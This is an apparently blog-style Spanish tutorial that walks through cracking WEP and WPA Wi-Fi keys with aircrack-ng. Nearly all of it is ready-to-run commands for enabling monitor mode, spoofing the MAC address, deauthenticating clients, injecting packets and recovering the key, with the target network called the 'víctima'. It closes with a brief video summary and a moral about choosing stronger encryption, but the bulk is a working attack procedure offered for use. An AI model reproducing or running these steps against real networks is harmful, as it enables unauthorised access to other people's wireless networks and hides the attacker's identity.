Vamos al grano, primero debemos tener una distribución linux instalada en nuestro equipo… yo use ubuntu y opensuse pero como se que ubuntu es mas “popular” les explicare como se hace en ubuntu, en todo caso se puede aplicar para cualquier distro, los paquetes son los mismos y básicamente debería ser lo mismo en cualquiera que usen… también cabe mencionar que hay un tema de hardware que influye mucho en que todo pueda salir bien o que la captura de datos tome mas o menos tiempo, yo use un dispositivo wireless atheros AR5001 que funciona a la perfección.

Lo primero es ponerle clave al root de ubuntu, no me gusta el SUDO, ahora si a ti te gusta usar sudo entonces antepone sudo a todos los comandos.

¿Como le damos password al root de ubuntu? Facil:

sudo passwd root

nos pedira la pass de usuario ya que usamos “sudo” y luego nos pedira la nueva password para el usuario root, hecho esto nos logueamos como root:

$ su [enter]

el $ y el [enter] no lo escriban… ahi nos pedira la pass de root, la tipeamos y listo, ya estamos en una consola como root.

Lo segundo seria instalar la suite aircrack-ng:

apt-get install aircrack-ng

Luego instalamos Macchanger:

apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal:

- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR).

airmon-ng start wlan0

- Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0

ifconfig mon0 down

-Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55

macchanger -m 00:11:22:33:44:55 mon0

- Damos de alta mon0

ifconfig mon0 up

- Escaneamos las redes disponibles y encontramos a nuestra “víctima” o mas bien dicho nuestro Access point o Router.

airodump-ng mon0

- Detenemos el Scaneo con Control + C

- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima

airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

OJO: hay que borrar los corchetes.

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red
- Cambiando los datos de los corchetes por los de nuestra víctima

Para WEP:

aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

Para WPA:

aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.

PARA WEP

aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

- Le decimos que si (y) y le damos enter.

PARA WPA

aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

El diccionario deben descargarlo ustedes, ahí tienen para entretenerse buscando en Google o su buscador favorito.

PARA WEP:

- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.

aircrack-ng -z [nombre red]*.cap

y esperamos a que nos descifre la clave, una ves descifrada con éxito te dará la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalámbrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX.

Este video How-To explica en 4 minutos cómo vulnerar la seguridad WEP (Wired Equivalent Privacy) de una red inalámbrica usando la distribución especializada en la seguridad BackTrack 4.

Básicamente, el método descrito hace uso de la suite de seguridad Aircrack-ng, para romper la clave WEP. Sin embargo, debemos notar que para ello es necesario intercambiar antes una gran cantidad de paquetes con la red en cuestión, un proceso que puede durar alrededor de una hora.

La moraleja de este tutorial es que la mayoría de las conexiones WEP pueden vulnerarse en menos de dos horas, y que siempre debemos optar por cifrado más fuerte, como WPA o WPA2, que aunque tampoco son infalibles, por lo menos es más difícil irrumpir en ellas.